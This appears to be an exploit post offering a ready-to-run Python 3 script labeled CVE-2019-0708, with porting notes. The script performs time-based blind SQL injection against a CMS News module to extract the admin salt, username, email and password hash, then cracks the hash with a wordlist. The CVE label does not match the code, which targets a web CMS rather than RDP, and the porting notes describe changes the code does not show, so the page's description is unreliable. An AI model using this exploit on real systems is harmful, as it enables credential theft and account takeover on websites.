Exploits Python cve-2019-0708 – by HackHeart 🧠 Code Review & Porting - Python 2 → Python 3 This exploit was originally written in Python 2, which is no longer supported by modern systems. To ensure compatibility and maintain future-proof tooling, the entire codebase has been carefully reviewed and migrated to Python 3.
🔧 Key improvements during the port:
Updated print statements to Python 3 syntax
Replaced raw_input() with input()
Adapted socket operations to handle byte/str properly (.decode() added)
Removed deprecated methods like xrange() and .iteritems()
Validated script compatibility with Python 3.8+ and modern Linux distros
🛡️ This version maintains the exploit logic intact while ensuring:
Compatibility with modern OSCP / Red Team labs
Cleaner, safer, and more readable syntax
Ready-to-run in modern environments (VS Code, Kali, Parrot OS…)
#!/usr/bin/env python3
import requests import time import argparse import hashlib
parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', required=True, help="Base target URI (e.g. http://10.10.10.100/cms)") parser.add_argument('-w', '--wordlist', help="Wordlist for cracking admin password") parser.add_argument('-c', '--crack', action='store_true', help="Crack password with wordlist")
args = parser.parse_args()
url_vuln = args.url.rstrip('/') + '/moduleinterface.php?mact=News,m1_,default,0' session = requests.Session() dictionary = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@._-$' TIME = 1
flag = True salt = '' username = '' email = '' password_hash = '' output = ""
def dump_field(field_name, table, column, condition): global flag result = "" ord_result = "" while flag: flag = False for char in dictionary: temp_result = result + char ord_temp_result = ord_result + format(ord(char), "x") print(f"[*] Trying {temp_result}") payload = f"a,b,1,5))+AND+(SELECT+SLEEP({TIME})+FROM+{table}+WHERE+{column}+LIKE+0x{ord_temp_result}25+AND+{condition})--+" start_time = time.time() session.get(url_vuln + "&m1_idlist=" + payload) if time.time() - start_time >= TIME: result = temp_result ord_result = ord_temp_result flag = True break return result
print("[+] Extracting salt...") flag = True salt = dump_field("salt", "cms_siteprefs", "sitepref_value", "sitepref_name+LIKE+0x736974656d61736b") output += f"Salt: {salt}\n"
print("[+] Extracting username...") flag = True username = dump_field("username", "cms_users", "username", "user_id+LIKE+0x31") output += f"Username: {username}\n"
print("[+] Extracting email...") flag = True email = dump_field("email", "cms_users", "email", "user_id+LIKE+0x31") output += f"Email: {email}\n"
print("[+] Extracting password hash...") flag = True password_hash = dump_field("password", "cms_users", "password", "user_id+LIKE+0x31") output += f"Hash: {password_hash}\n"
if args.crack and args.wordlist: print("[+] Cracking password...") with open(args.wordlist, 'r', encoding='utf-8', errors='ignore') as f: for line in f: word = line.strip() print(f"[*] Trying password: {word}") if hashlib.md5((salt + word).encode()).hexdigest() == password_hash: output += f"[+] Password cracked: {word}\n" break
print("\n=== Exploit Results ===") print(output)